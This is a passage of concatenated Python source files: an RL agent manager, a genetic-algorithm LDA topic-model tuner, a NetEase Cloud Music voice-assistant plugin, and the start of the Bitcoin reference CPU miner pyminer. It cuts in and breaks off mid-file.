self.obs_loader = tf.placeholder(tf.float32, [self.batch_size, np.prod(self.config["env"]["obs_dims"])])
## build model
self.valuerl = valuerl.ValueRL(self.config["name"], self.config["env"], self.config["policy_config"])
self.policy_actions = self.valuerl.build_evalution_graph(self.obs_loader, mode="exploit" if self.evaluation else "explore")
# interactors
self.agent_pipes, self.agent_child_pipes = list(zip(*[multiprocessing.Pipe() for _ in range(self.batch_size)]))
self.agents = [multiprocessing.Process(target=run_env, args=(self.agent_child_pipes[i],)) for i in range(self.batch_size)]
for agent in self.agents: agent.start()
self.obs = [pipe.recv() for pipe in self.agent_pipes]
self.total_rewards = [0. for _ in self.agent_pipes]
self.loaded_policy = False
self.sess = tf.Session()
self.sess.run(tf.global_variables_initializer())
self.rollout_i = 0
self.proc_num = proc_num
self.epoch = -1
self.frame_total = 0
self.hours = 0.
self.first = True
def get_action(self, obs):
if self.loaded_policy:
all_actions = self.sess.run(self.policy_actions, feed_dict={self.obs_loader: obs})
all_actions = np.clip(all_actions, -1., 1.)
return all_actions[:self.batch_size]
else:
return [self.get_random_action() for _ in range(obs.shape[0])]
def get_random_action(self, *args, **kwargs):
return np.random.random(self.config["env"]["action_dim"]) * 2 - 1
def step(self):
actions = self.get_action(np.stack(self.obs))
self.first = False
[pipe.send(action) for pipe, action in zip(self.agent_pipes, actions)]
next_obs, rewards, dones, resets = list(zip(*[pipe.recv() for pipe in self.agent_pipes]))
frames = list(zip(self.obs, next_obs, actions, rewards, dones))
self.obs = [o if resets[i] is False else self.agent_pipes[i].recv() for i, o in enumerate(next_obs)]
for i, (t,r,reset) in enumerate(zip(self.total_rewards, rewards, resets)):
if reset:
self.total_rewards[i] = 0.
if self.evaluation and self.loaded_policy:
with portalocker.Lock(self.log_path+'.greedy.csv', mode="a") as f: f.write("%2f,%d,%d,%2f\n" % (self.hours, self.epoch, self.frame_total, t+r))
else:
self.total_rewards[i] = t + r
if self.evaluation and np.any(resets): self.reload()
self.rollout_i += 1
return frames
def reload(self):
if not os.path.exists("%s/%s.params.index" % (self.load_path ,self.valuerl.saveid)): return False
with self.policy_lock:
self.valuerl.load(self.sess, self.load_path)
self.epoch, self.frame_total, self.hours = self.sess.run([self.valuerl.epoch_n, self.valuerl.frame_n, self.valuerl.hours])
self.loaded_policy = True
self.first = True
return True
def main(proc_num, evaluation, policy_replay_frame_queue, model_replay_frame_queue, policy_lock, config):
try:
np.random.seed((proc_num * int(time.time())) % (2 ** 32 - 1))
agentmanager = AgentManager(proc_num, evaluation, policy_lock, config["evaluator_config"]["batch_size"] if evaluation else config["agent_config"]["batch_size"], config)
frame_i = 0
while True:
new_frames = agentmanager.step()
if not evaluation:
policy_replay_frame_queue.put(new_frames)
if model_replay_frame_queue is not None: model_replay_frame_queue.put(new_frames)
if frame_i % config["agent_config"]["reload_every_n"] == 0: agentmanager.reload()
frame_i += len(new_frames)
except Exception as e:
print('Caught exception in agent process %d' % proc_num)
traceback.print_exc()
print()
try:
for i in agentmanager.agents: i.join()
except:
pass
raise e
|
Tune_GALDA.py | import numpy as np
from sklearn import feature_extraction
from sklearn.feature_extraction.text import CountVectorizer
from pyevolve import G1DList
from pyevolve import GSimpleGA
from pyevolve import Crossovers
import numpy as np
import os
from gensim import corpora, models, interfaces
import gensim
from itertools import izip
from joblib import Parallel, delayed
import multiprocessing
from multiprocessing import Process, Manager
from threading import Thread
import scipy.spatial
foldermain = '../Experiments'
foldername = foldermain + '/FILTEREDRM/PREPROCESSED/'
foldermodels = foldermain + '/MODELS/'
clu2orig={}
docTopicProbMat=None
#COMPUTE BASIC CORPUS AND STUFF
corpus = []
fileList = os.listdir(foldername)
count = 0
corpus = []
texts = []
rc = 0
for f in fileList:
if (rc % 10 == 0):
print("Processed ::" + str(rc) + ":: Files ")
f = open(foldername + f, 'r')
txt = str(f.read())
corpus.append(txt)
texts.append(txt.split())
rc += 1
dictionary = corpora.Dictionary(texts)
corpus2 = [dictionary.doc2bow(text) for text in texts]
dictionary.save(foldermodels+'MultiCore.dict')
corpora.MmCorpus.serialize(foldermodels+'MultiCoreCorpus.mm', corpus2)
# term frequency
NumApp = len(corpus)
NumFeatures = len(dictionary)
#vectorizer=CountVectorizer(stop_words='english', strip_accents='ascii', max_features=NumFeatures, dtype=np.int32)
vectorizer = CountVectorizer(max_features=NumFeatures, dtype=np.int32)
tf_array = vectorizer.fit_transform(corpus).toarray()
vocab = vectorizer.get_feature_names()
print("Starting Mutations::")
# print(corpus)
print(NumApp)
print(NumFeatures)
NumFeatures = len(vocab)
print(NumFeatures)
print(count)
Centers = []
Clusters = []
classes = []
logfile=open(foldermodels+'/log.txt','w')
sqD=scipy.spatial.distance.squareform(scipy.spatial.distance.pdist(tf_array))
shScore = {}
def CalSilhouette2(j):
min_b = 10000
max_a = 0
clu = classes[j]
global sqD
for i in xrange(len(Centers)):
if i != clu:
b = np.linalg.norm(Centers[i] - tf_array[j])
if b < min_b:
min_b = b
for k in xrange(len(Clusters[clu])):
a = sqD[clu2orig[clu][k], j] # np.linalg.norm(Clusters[clu][k]-tf_array[j])
if a > max_a:
max_a = a
sh = ((min_b - max_a) / max(max_a, min_b))
if (j % 5000 == 0):
print("Calclated Silhoute for :" + str(j) + " Documents")
return sh
topic_num = None
def getTopicProb(j):
currrdocProb = [0]*topic_num
for p in docTopicProbMat[j]:
currrdocProb[p[0]]=p[1]
return currrdocProb
def eval_func(NTopic):
global count
# NTopic[0]=2
print NTopic[0]
# LDA
# model = lda.LDA(n_topics=NTopic[0], n_iter=20,alpha=50.00/NTopic[0],eta=0.01,random_state=12)
# model.fit(tf_array)
# doc_topic = model.doc_topic_
global topic_num
numoftopics = int(NTopic[0] / 10)
topic_num = numoftopics
iters = NTopic[1]
# al=float(50.00)/float(NTopic[2])
al = (float(NTopic[2]) - 20) / 480
bet = (float(NTopic[3]) - 20) / 480
if al==0.0:
al = 1/480
if bet==0.0:
bet = 1/480
#al= 0
#bet = 0
log=str(count)+' '+str(numoftopics) + ' ' + str(iters) + ' ' + str(al) + ' ' + str(bet) + "\n"
print log
logfile.write(log)
# model=gensim.models.ldamodel.LdaModel(corpus2,num_topics=NTopic[0],id2word=dictionary,iterations=20,alpha=50.00/NTopic[0],eta=0.01)
# model=gensim.models.ldamulticore.LdaMulticore(corpus2,num_topics=NTopic[0],id2word=dictionary,iterations=20,alpha=50.00/NTopic[0],eta=0.01)
model = gensim.models.ldamulticore.LdaMulticore(corpus2, num_topics=numoftopics, id2word=dictionary,
iterations=iters, alpha=al, eta=bet)
#model = gensim.models.ldamulticore.LdaMulticore(corpus2, num_topics=numoftopics, id2word=dictionary,
# iterations=iters)
#model.save(foldermodels+str(log) + '.model')
print("Created Model::" + str(count))
doc_topic_list = []
global docTopicProbMat
docTopicProbMat=None
docTopicProbMat = model[corpus2]
#sequential
'''
for l, t in izip(docTopicProbMat, corpus):
# print t,"#",l
currrdocProb = []
for p in l:
currrdocProb.append(p[1])
# print(p[1])
doc_topic_list.append(currrdocProb)
'''
pool = multiprocessing.Pool(processes=4)
doc_topic_list = pool.map(getTopicProb, xrange(len(docTopicProbMat)))
doc_topic = np.array(doc_topic_list)
print "********doc topic shape:",doc_topic.shape
global classes
classes = []
for i in range(NumApp):
try:
# print("Processing Document "+str(i)+"::"+str(corpus[i]+str(doc_topic[i])))
classes.append(np.array(doc_topic[i]).argmax())
except:
print("Error for Document " + str(i) + "::" + str(corpus[i] + str(doc_topic[i])))
classes = np.array(classes)
# Centroid
global Centers
global Clusters
Centers = []
Clusters = []
global clu2orig
clu2orig={}
for i in range(numoftopics):
clu2orig[i] = {}
tmp_sum = np.zeros((1, NumFeatures))
cnt = 0
points = []
# p = tf_array[classes==i]
# points = list(p)
# c_i = p.mean()
for j in range(NumApp):
if classes[j] == i:
points.append(tf_array[j])
tmp_sum = tmp_sum + tf_array[j]
clu2orig[i][cnt] = j
cnt = cnt + 1
c_i = tmp_sum / cnt
Centers.append(c_i)
Clusters.append(points)
if (len(Clusters) % 100 == 0):
print(str(len(Clusters)) + " ::: CREATED")
print(str(len(Clusters)) + " ::: CREATED")
print("CALCULATING SILHOUEET COFEFFICENT")
# Silhouette coefficient Compute In Parallel
s_j = []
# MULTIPROCESSING
numofcores = multiprocessing.cpu_count()
s_j = Parallel(n_jobs=2)(delayed(CalSilhouette2)(j) for j in range(NumApp))
# MULTITHREADING
'''
for j in range(NumApp):
t = Thread(target=CalSilhouette,args=(j,))
t.start()
t.join()
'''
'''
#NORMAL SEQUENTIAL
for j in range(NumApp):
min_b=10000
max_a=0
clu=classes[j]
for i in range(len(Centers)):
if i!=clu:
b=np.linalg.norm(Centers[i]-tf_array[j])
if b<min_b:
min_b=b
for k in range(len(Clusters[clu])):
a=np.linalg.norm(Clusters[clu][k]-tf_array[j])
if a>max_a:
max_a=a
s_j.append((min_b-max_a)/max(max_a,min_b))
print("Cacluated Silhoute for::"+str(len(s_j))+":DOCS:")
'''
s = sum(s_j) / NumApp
s = (s + 1) / 2
log = "SCORE::" + str(s)
print log
logfile.write(log+'\n')
count = count + 1
print("COUNT::" + str(count))
model.clear()
return s
def eval_func2(NTopic):
# NTopic[0]=2
print NTopic[0]
# LDA
# model = lda.LDA(n_topics=NTopic[0], n_iter=20,alpha=50.00/NTopic[0],eta=0.01,random_state=12)
# model.fit(tf_array)
# doc_topic = model.doc_topic_
numoftopics = int(NTopic[0] / 10)
iters = NTopic[1]
# al=float(50.00)/float(NTopic[2])
al = (float(NTopic[2]) - 20) / 480
bet = (float(NTopic[3]) - 20) / 480
#al = 0
#bet = 0
global shScore
log=str(numoftopics) + ' ' + str(iters) + ' ' + str(al) + ' ' + str(bet) + "\n"
print log
if not log in shScore:
shScore[log] = eval_func(NTopic)
return shScore[log]
def eval_func_JustModel(NTopic):
global count
# NTopic[0]=2
print NTopic[0]
# LDA
# model = lda.LDA(n_topics=NTopic[0], n_iter=20,alpha=50.00/NTopic[0],eta=0.01,random_state=12)
# model.fit(tf_array)
# doc_topic = model.doc_topic_
global topic_num
numoftopics = int(NTopic[0] / 10)
topic_num = numoftopics
iters = NTopic[1]
# al=float(50.00)/float(NTopic[2])
al = (float(NTopic[2]) - 20) / 4800
bet = (float(NTopic[3]) - 20) / 4800
log=str(count)+' '+str(numoftopics) + ' ' + str(iters) + ' ' + str(al) + ' ' + str(bet) + "\n"
print log
logfile.write(log)
print("Creating Model::" + str(count))
model = gensim.models.ldamulticore.LdaMulticore(corpus2,passes=20, num_topics=numoftopics, id2word=dictionary,iterations=iters,alpha=al,eta=bet)
model.save(foldermodels+str(numoftopics) +'_'+str(iters) + '.model')
#model= gensim.models.ldamodel.LdaModel.load(foldermodels + '44_171.model')
doc_topic_list = []
genome = G1DList.G1DList(4)
genome.evaluator.set(eval_func2)
genome.setParams(rangemin=20, rangemax=50)
genome.crossover.set(Crossovers.G1DListCrossoverUniform)
ga = GSimpleGA.GSimpleGA(genome)
ga.setPopulationSize(10)
ga.setGenerations(10)
ga.evolve(freq_stats=1)
print ga.bestIndividual()
# print(corpus)
print(NumApp)
#print(NumFeatures)
print(count)
fo = open(foldermodels+"bestindividual", "a")
eval_func_JustModel(ga.bestIndividual().genomeList)
fo.write(str(ga.bestIndividual()))
logfile.write(str(ga.bestIndividual())+'\n')
fo.close()
logfile.close()
try:
#foldermain = wd + '/Experiments/'
# folderpath='../EXPERIMENTS/MODELS/'
folderpath = foldermain + '/MODELS/'
dictionary = gensim.corpora.Dictionary.load(folderpath + 'MultiCore.dict')
corpus = gensim.corpora.MmCorpus(folderpath + 'MultiCoreCorpus.mm')
modelfile = ''
# for f in os.listdir(folderpath):
# if ('.model' in f and '.model.state' not in f):
# modelfile = f
for f in os.listdir(folderpath):
if ('.model' in f):
filetype = f.split('.')[-1]
if filetype not in ['state','id2word','npy']:
modelfile = f
print(modelfile)
model_test = gensim.models.ldamodel.LdaModel.load(folderpath + modelfile)
#
# In[5]:
# show word probabilities for each topic
X = model_test.show_topics(num_topics=50, num_words=5, log=False, formatted=False)
test = [(x[0], [y[0] for y in x[1]]) for x in X]
topicDesc = {}
for t in test:
topicstr = ' + '.join(str(e) for e in t[1])
# print topicstr
topicDesc[t[0]] = topicstr
model_test.show_topics(num_topics=50, num_words=5, log=False, formatted=False)
# In[6]:
# WRITETOFILE
folder = foldermain + '/REPOPROPS/'
for k in topicDesc.keys():
line = str(k) + ',' + topicDesc[k]
fout = open(folder + 'topickeys.csv', 'a')
fout.write(line + '\n')
fout.close()
# In[7]:
# LOAD DOCUMENTS
import os
foldername = foldermain + '/FILTEREDRM/PREPROCESSED/'
fileList = os.listdir(foldername)
docdict = {}
for fn in fileList:
f = open(foldername + fn, 'r')
txt = str(f.read())
docdict[fn] = txt.split()
f.close()
# In[8]:
# FIND TOPIC
import numpy as np
docTopicDict = {}
for d in docdict.keys():
docProbs = model_test[[dictionary.doc2bow(docdict[d])]]
currrdocProb = [0] * 49
for p in docProbs[0]:
currrdocProb[p[0]] = p[1]
doc_topic = np.array(currrdocProb)
topic = np.array(doc_topic).argmax()
docTopicDict[d.strip().replace('.txt', '')] = topic
# In[9]:
# WRITE DOCTOPIC TO FILES
folder = foldermain + '/REPOPROPS/'
for k in docTopicDict:
line = k + ',' + str(docTopicDict[k])
fout = open(folder + 'doctopic.csv', 'a')
fout.write(line + '\n')
fout.close()
# In[10]:
# LOAD DOC/proj/repo NAMEs
#repdata = os.listdir(foldermain + '/HTMLSORG')
repdata=os.listdir(foldermain+'/FILTEREDRM/PREPROCESSED/')
# In[11]:
# COMBINE DATA
fnames = docTopicDict.keys()
cnt = 0
folder = foldermain + '/REPOPROPS/'
comb = open(folder + 'comb2desc.csv', 'a')
for repoline in repdata:
# fkey=repoline.split(',')[0]
fkey = repoline.replace('.txt', '')
if (fkey in fnames):
currtopic = docTopicDict[fkey]
newline = repoline.replace('\n', '') + ',' + str(currtopic) + ',' + str(topicDesc[currtopic])
else:
newline = repoline.replace('\n', '') + ',TOPICASSIGNED,TOPICWORDS'
comb.write(newline + '\n')
comb.close()
except:
print("Error Occured whil combining topics with documents")
|
NetEaseMusic.py | # -*- coding: utf-8-*-
# 网易云音乐播放插件
import logging
import threading
import hashlib
import time
import subprocess
import sys
import os
import re
import random
from MusicBoxApi import api as NetEaseApi
import eyed3
reload(sys)
sys.setdefaultencoding('utf8')
# Standard module stuff
WORDS = ["YINYUE"]
SLUG = "netease_music"
def handle(text, mic, profile, wxbot=None):
"""
Responds to user-input, typically speech text
Arguments:
text -- user-input, typically transcribed speech
mic -- used to interact with the user (for both input and output)
profile -- contains information related to the user (e.g., phone
number)
wxbot -- wechat bot instance
"""
logger = logging.getLogger(__name__)
kwargs = {}
kwargs['mic'] = mic
kwargs['profile'] = profile
logger.debug("Preparing to start netease music module")
try:
netease_wrapper = NetEaseWrapper(**kwargs)
except Exception, e:
logger.debug(e)
logger.error("Couldn't connect to NetEase server", exc_info=True)
mic.say(u"访问网易云音乐失败了,请稍后再试", cache=True)
return
persona = 'DINGDANG'
if 'robot_name' in profile:
persona = profile['robot_name']
robot_name_cn = u'叮当'
if 'robot_name_cn' in profile:
robot_name_cn = profile['robot_name_cn']
logger.debug("Starting music mode")
music_mode = MusicMode(persona, robot_name_cn, mic, netease_wrapper, wxbot)
music_mode.stop = False
# 登录网易云音乐
account = ''
password = ''
report = False
local_default = False
if SLUG in profile:
if 'account' in profile[SLUG]:
account = profile[SLUG]['account']
if 'password' in profile[SLUG]:
password = profile[SLUG]['password']
if 'report' in profile[SLUG]:
report = profile[SLUG]['report']
if 'local_default' in profile[SLUG]:
local_default = profile[SLUG]['local_default']
if account == '' or password == '':
mic.say("请先配置好账户信息再找我播放音乐", cache=True)
return
has_login = False
home_dir = os.path.expandvars('$HOME')
user_info = os.path.join(home_dir, 'userInfo')
if not (os.path.exists(user_info)):
mic.say("稍等,正在为您登录网易云音乐", cache=True)
res = music_mode.login(account, password, report)
if res:
mic.say("登录成功", cache=True)
has_login = True
else:
music_mode.read_login_info(user_info, report)
has_login = True
if not has_login:
mic.say("登录失败, 退出播放. 请检查配置, 稍后再试", cache=True)
return
if wxbot is not None:
wxbot.music_mode = music_mode
pattern = re.compile(ur'(我想听|来一首)([,]?)([\u4e00-\u9fa5]*)')
text_utf8 = text.decode('utf-8')
if pattern.match(text_utf8) and text != u'播放音乐':
m = pattern.search(text_utf8)
song_name = m.group(3)
if song_name != '':
music_mode.handleForever(
play_type=2, song_name=song_name) # 2: 播放指定歌曲
elif any(word in text for word in [u"歌单", u"我的"]):
music_mode.handleForever(play_type=1) # 1: 用户歌单
else:
# 默认播放本地音乐
if local_default:
music_mode.handleForever(play_type=3) # 3: 本地音乐
else:
music_mode.handleForever(play_type=0) # 0: 推荐榜单
logger.debug("Exiting music mode")
return
def isValid(text):
"""
Returns True if the input is related to music.
Arguments:
text -- user-input, typically transcribed speech
"""
return any(word in text for word in [u"听歌", u"音乐", u"播放",
u"我想听", u"唱歌", u"唱首歌",
u"歌单", u"榜单"])
# The interesting part
class MusicMode(object):
def __init__(self, PERSONA, robot_name_cn, mic,
netease_wrapper, wxbot=None):
self._logger = logging.getLogger(__name__)
self.persona = PERSONA
self.robot_name_cn = robot_name_cn
self.music = netease_wrapper
self.mic = mic
self.wxbot = wxbot
self.search_mode = False
self.to_listen = True
self.to_report = False
self.delegating = False
if self.wxbot is not None:
self.msg_thread = threading.Thread(target=self.wxbot.proc_msg)
def read_login_info(self, user_info, report=False):
self.to_report = report
self.music.read_login_info(user_info)
def login(self, account, password, report=False):
self.to_report = report
return self.music.login(account, password)
def delegateInput(self, input, call_by_wechat=False):
command = input.upper()
if command.startswith(self.robot_name_cn + ": "):
return
if call_by_wechat:
self._logger.debug('called by wechat')
self.music.stop()
time.sleep(.1)
# check if input is meant to start the music module
if u"榜单" in command:
self.mic.say(u"播放榜单音乐", cache=True)
self.music.update_playlist_by_type(0)
self.music.play(self.to_report)
return
elif u"歌单" in command:
self.music.update_playlist_by_type(1)
self.music.play(self.to_report)
return
elif any(ext in command for ext in [u"停止聆听", u"关闭聆听", u"别听我的"]):
if self.wxbot is None or not self.wxbot.is_login:
self.mic.say(u"您还未登录微信,不能关闭语音交互功能", cache=True)
return
self.mic.say(u"关闭语音交互功能", cache=True)
self.to_listen = False
self.music.play(False)
return
elif any(ext in command for ext in [
u"恢复聆听", u"开始聆听", u"开启聆听", u"听我的"]):
self.mic.say(u"开启语音交互功能", cache=True)
self.to_listen = True
self.music.play(False)
return
elif u"暂停" in command:
self.mic.say(u"暂停播放", cache=True)
self.music.pause()
return
elif any(ext in command for ext in [u"结束", u"退出", u"停止"]):
self.music.exit()
self.mic.say(u"结束播放", cache=True)
if self.wxbot is not None:
self.wxbot.music_mode = None
return
elif any(ext in command for ext in [u"大声", u"大声点", u"大点声"]):
self.mic.say(u"大点声", cache=True)
self.music.increase_volume()
return
elif any(ext in command for ext in [u"小声", u"小点声", u"小声点"]):
self.mic.say(u"小点声", cache=True)
self.music.decrease_volume()
return
elif any(
ext in command for ext in [
u'下一首', u"下首歌", u"切歌",
u"下一首歌", u"换首歌", u"切割",
u"那首歌"]):
self.mic.say(u"下一首歌", cache=True)
self.music.next()
return
elif any(ext in command for ext in [u'上一首', u'上一首歌', u'上首歌']):
self.mic.say(u"上一首歌", cache=True)
self.music.previous()
return
elif any(ext in command for ext in [u'搜索', u'查找']):
if call_by_wechat:
self.search_mode = True
self.mic.say(u"请直接回复要搜索的关键词", cache=True)
return
else:
self.mic.say(u"请在滴一声后告诉我您要搜索的关键词", cache=True)
input = self.mic.activeListen(MUSIC=True)
if input is None or input.strip() == '':
self.mic.say("没有听到关键词呢,请重新叫我查找吧", cache=True)
self.music.play(False)
return
self.mic.say(u'正在为您搜索%s' % input)
self.music.update_playlist_by_type(2, input)
self.music.play(self.to_report)
return
elif u'什么歌' in command:
self.mic.say(u"正在播放的是%s的%s" % (
self.music.song['artist'],
self.music.song['song_name']))
self.music.play(False)
return
elif u'随机' in command:
self.mic.say(u"随机播放", cache=True)
self.music.randomize()
return
elif u'顺序' in command:
self.mic.say(u"顺序播放", cache=True)
self.music.serialize()
return
elif any(ext in command for ext in [u"播放", u"继续", u"我想听", u"来一首"]):
pattern = re.compile(ur'(播放|我想听|来一首)([,]?)([\u4e00-\u9fa5]+)')
text_utf8 = command.decode('utf-8')
song_name = ''
if pattern.match(text_utf8):
m = pattern.search(text_utf8)
song_name = m.group(3)
if song_name != '':
self.music.update_playlist_by_type(2, song_name)
elif u'即将播放' not in command:
self.music.play(self.to_report)
return
elif self.search_mode:
self.search_mode = False
input = command
if input is None or input.strip() == '':
self.mic.say("没有听到关键词呢,请重新叫我查找吧", cache=True)
self.music.play(False)
return
self.mic.say(u'正在为您搜索%s' % input)
self.music.update_playlist_by_type(2, input)
self.music.play(self.to_report)
else:
self.mic.say(u"没有听懂呢。要退出播放,请说退出播放", cache=True)
self.music.play(False)
return
return
def handleForever(self, play_type=0, song_name=''):
"""
进入音乐播放
play_type - 0:播放推荐榜单;1:播放用户歌单
"""
if song_name != '':
self.music.update_playlist_by_type(2, song_name)
else:
self.music.update_playlist_by_type(play_type)
self.music.start()
if self.wxbot is not None:
self.msg_thread.start()
while True:
if self.music.is_stop:
self._logger.info('Stop Netease music mode')
return
if not self.to_listen or self.delegating:
self._logger.info("Listening mode is disabled.")
continue
try:
self._logger.info('离线唤醒监听中')
threshold, transcribed = self.mic.passiveListen(self.persona)
except Exception, e:
self._logger.debug(e)
threshold, transcribed = (None, None)
if not transcribed or not threshold:
self._logger.info("Nothing has been said or transcribed.")
continue
# 当听到呼叫机器人名字时,停止播放
self.music.stop()
time.sleep(.1)
# 听用户说话
input = self.mic.activeListen(MUSIC=True)
if input:
if any(ext in input for ext in [u"结束", u"退出", u"停止"]):
self.mic.say(u"结束播放", cache=True)
self.music.stop()
self.music.exit()
return
if not self.delegating:
self.delegating = True
self.delegateInput(input)
self.delegating = False
else:
self.mic.say(u"什么?", cache=True)
if not self.music.is_pause:
self.music.play(False)
class NetEaseWrapper(threading.Thread):
def __init__(self, mic, profile):
super(NetEaseWrapper, self).__init__()
self.cond = threading.Condition()
self.netease = NetEaseApi.NetEase()
self.mic = mic
self.profile = profile
self.userId = ""
self.volume = 0.7
self.song = None # 正在播放的曲目信息
self.idx = -1 # 正在播放的曲目序号
self.random = False
self.playlist = []
self.is_pause = False
self.is_stop = False
def set_cond(self, cond):
self.cond = cond
def update_playlist_by_type(self, play_type, keyword=''):
if play_type == 0:
# 播放热门榜单音乐
self.playlist = self.get_top_songlist()
elif play_type == 1:
# 播放用户歌单
user_playlist = self.get_user_playlist()
if user_playlist > 0:
self.playlist = self.get_song_list_by_playlist_id(
user_playlist[0]['id'])
if len(self.playlist) == 0:
self.mic.say("用户歌单没有歌曲,改为播放推荐榜单", cache=True)
self.playlist = self.get_top_songlist()
else:
self.mic.say("当前用户没有歌单,改为播放推荐榜单", cache=True)
self.playlist = self.get_top_songlist()
elif play_type == 2:
# 搜索歌曲
self.playlist = self.search_by_name(keyword)
elif play_type == 3:
self.playlist = self.get_local_songlist()
def get_local_songlist(self): # 本地音乐
local_path = ''
if 'local_path' in self.profile[SLUG]:
local_path = self.profile[SLUG]['local_path']
playlist = []
for (dirpath, dirnames, filenames) in os.walk(local_path):
# f.extend(filenames)
for filename in filenames:
# only mp3 accept
if os.path.splitext(filename)[1] != ".mp3":
continue
# read mp3 properties and add to the playlist
mp3_path = dirpath + filename
audiofile = eyed3.load(mp3_path)
music_info = {}
music_info.setdefault("song_id", audiofile.tag.track_num[0])
music_info.setdefault("song_name", audiofile.tag.title)
music_info.setdefault("artist", audiofile.tag.artist)
music_info.setdefault("album_name", audiofile.tag.album)
music_info.setdefault("mp3_url", "'{}'".format(mp3_path))
music_info.setdefault("playTime", int(
audiofile.info.time_secs) * 1000)
music_info.setdefault("quality", "")
playlist.append(music_info)
break
return playlist
def get_top_songlist(self): # 热门单曲
music_list = self.netease.top_songlist()
datalist = self.netease.dig_info(music_list, 'songs')
playlist = []
for data in datalist:
music_info = {}
music_info.setdefault("song_id", data.get("song_id"))
music_info.setdefault("song_name", data.get("song_name"))
music_info.setdefault("artist", data.get("artist"))
music_info.setdefault("album_name", data.get("album_name"))
music_info.setdefault("mp3_url", data.get("mp3_url"))
music_info.setdefault("playTime", data.get("playTime"))
music_info.setdefault("quality", data.get("quality"))
playlist.append(music_info)
return playlist
def read_login_info(self, user_info):
assert(os.path.exists(user_info))
with open(user_info) as f:
self.userId = f.readline()
def login(self, username, password): # 用户登陆
password = hashlib.md5(password).hexdigest()
login_info = self.netease.login(username, password)
if login_info['code'] == 200:
res = True
userId = login_info.get('profile').get('userId')
self.userId = userId
home_dir = os.path.expandvars('$HOME')
user_info = os.path.join(home_dir, 'userInfo')
file = open(user_info, 'w')
file.write(str(userId))
file.close()
else:
res = False
return res
def get_user_playlist(self): # 获取用户歌单
play_list = self.netease.user_playlist(self.userId) # 用户歌单
return play_list
def get_song_list_by_playlist_id(self, playlist_id):
songs = self.netease.playlist_detail(playlist_id)
song_list = self.netease.dig_info(songs, 'songs')
return song_list
def search_by_name(self, song_name):
data = self.netease.search(song_name)
song_ids = []
if 'songs' in data['result']:
if 'mp3Url' in data['result']['songs']:
songs = data['result']['songs']
else:
for i in range(0, len(data['result']['songs'])):
song_ids.append(data['result']['songs'][i]['id'])
songs = self.netease.songs_detail(song_ids)
song_list = self.netease.dig_info(songs, 'songs')
return song_list
def current_song(self):
if self.song is not None:
return self.song['song_name']
else:
return ''
def run(self):
while True:
if self.cond.acquire():
self.play()
self.pick_next()
def play(self, report=False):
if self.is_pause:
self.is_pause = False
if self.idx < len(self.playlist):
if self.idx == -1:
self.idx = 0
if not self.random:
song = self.playlist[self.idx]
else:
song = random.choice(self.playlist)
self.song = song
subprocess.Popen("pkill play", shell=True)
song['mp3_url'] = self.netease.songs_detail_new_api(
[song['song_id']])[0]['url']
mp3_url = song['mp3_url']
if mp3_url is None:
self.next()
self.cond.wait()
try:
if report:
self.mic.say(u"即将播放:%s,%s" % (
song['artist'], song['song_name']))
time.sleep(.1)
subprocess.Popen("play -v %f %s" % (
self.volume, mp3_url), shell=True, stdout=subprocess.PIPE)
self.cond.notify()
self.cond.wait(int(song.get('playTime')) / 1000)
except Exception:
pass
else:
try:
subprocess.Popen("pkill play", shell=True)
self.cond.notify()
self.cond.wait()
except Exception:
pass
def notify(self):
if self.cond.acquire():
self.cond.notifyAll()
self.cond.release()
def previous(self):
self.idx -= 2
if self.idx < 0:
self.idx = len(self.playlist) - 1
self.notify()
def pick_next(self):
self.idx += 1
if self.idx > len(self.playlist) - 1:
self.idx = 0
def next(self):
self.notify()
def randomize(self):
self.random = True
self.next()
def serialize(self):
self.random = False
self.notify()
def increase_volume(self):
self.volume += .1
if self.volume > 1:
self.volume = 1
self.notify()
def decrease_volume(self):
self.volume -= .1
if self.volume < 0:
self.volume = 0
self.notify()
def stop(self):
try:
subprocess.Popen("pkill play", shell=True)
self.cond.notifyAll()
self.cond.release()
self.cond.wait()
except Exception:
pass
def pause(self):
self.is_pause = True
# 暂不支持断点续播,因此暂停和停止相同处理
self.stop()
def exit(self):
self.is_stop = True
self.playlist = []
self.notify()
|
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
